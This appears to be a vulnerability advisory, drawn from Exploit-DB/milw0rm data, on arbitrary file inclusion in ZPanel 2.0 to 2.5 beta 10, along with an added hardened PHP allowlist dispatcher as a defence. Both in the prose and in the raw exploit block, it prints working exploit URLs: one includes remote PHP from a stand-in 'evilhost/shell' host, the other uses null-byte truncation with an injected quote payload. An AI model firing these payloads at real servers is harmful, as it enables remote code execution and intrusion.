Vendor: ZPanel
By: milw0rm.com
CVSS: 7.5 (HIGH)
Type: Arbitrary File Inclusion
CWE: Unknown
Product Name: ZPanel
Affected Version From: ZPanel version 2.0
Affected Version To: ZPanel version 2.5 beta 10
Patch Exists: NO
Related CWE: Unknown
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested:
2005

Arbitrary File Inclusion in ZPanel

It is possible to include arbitrary files in ZPanel version 2.0 and ZPanel version 2.5 beta 10; the `page` parameter of zpanel.php is used to select the file to include without adequate validation. In version 2.0 the inclusion is remote: the exploit involves accessing http://localhost/zpanel/zpanel.php?page=http://evilhost/shell, where http://evilhost/shell.php contains the malicious PHP code. In version 2.5 beta 10 the inclusion is local: the exploit involves accessing http://localhost/zpanel/zpanel.php?page=billinginfo/index.php%00'%20OR%20'1'='1, where the URL-encoded null byte (%00) truncates the path that the application builds from the parameter.
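The defensive pattern that closes both variants is to stop treating the request parameter as a path at all. The following hardened dispatcher is an added example, not ZPanel's own code; it assumes the application's page scripts live under a pages/ directory and uses a hypothetical ALLOWED_PAGES table as the only mapping from parameter to file.

```php
<?php
// Hardened replacement for a "?page=" include dispatcher (added example, not ZPanel code).
// Assumed layout: page scripts live under PAGE_ROOT; ALLOWED_PAGES is hypothetical.

const PAGE_ROOT = __DIR__ . '/pages';

// The request parameter is only ever a key into this table, never a path fragment,
// so neither a remote URL nor a null-byte-truncated path can reach include().
const ALLOWED_PAGES = [
    'home'        => 'home.php',
    'billinginfo' => 'billinginfo/index.php',
];

function resolve_page(string $requested): ?string
{
    // Reject NUL bytes and URL schemes explicitly; these are the two inputs the
    // advisory describes (null-byte truncation and remote inclusion). With the
    // allowlist below this check is redundant, but it makes the rejection explicit
    // and gives the application a clear event to log.
    if (strpos($requested, "\0") !== false
        || preg_match('#^[a-z][a-z0-9+.-]*://#i', $requested)) {
        return null;
    }

    if (!array_key_exists($requested, ALLOWED_PAGES)) {
        return null;
    }

    // Defence in depth: the allowlisted file must still resolve inside PAGE_ROOT,
    // so a misconfigured table entry cannot escape the page directory either.
    $root = realpath(PAGE_ROOT);
    $path = realpath(PAGE_ROOT . '/' . ALLOWED_PAGES[$requested]);
    if ($root === false || $path === false
        || strncmp($path, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $path;
}

$page = resolve_page((string) ($_GET['page'] ?? 'home'));
if ($page === null) {
    error_log('zpanel: rejected page parameter ' . var_export($_GET['page'] ?? null, true));
    http_response_code(404);
    exit('Unknown page');
}
require $page;
```

Setting allow_url_include=Off (and, on PHP versions that predate that directive, allow_url_fopen=Off) in php.ini removes the remote variant at the interpreter level, but only the allowlist closes the local one.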

Mitigation:

Unknown
Source (Exploit-DB raw data):

# Tested and working /str0ke

It is possible to include arbitrary files:
local - in version ZPanel <= 2.5 beta 10,
remote - in ZPanel 2.0.

[exploit for v 2.0]
http://localhost/zpanel/zpanel.php?page=http://evilhost/shell
where http://evilhost/shell.php is an evil PHP code script

[exploit for v 2.5 beta]
http://localhost/zpanel/zpanel.php?page=billinginfo/index.php%00'%20OR%20'1'='1


# milw0rm.com [2005-03-15]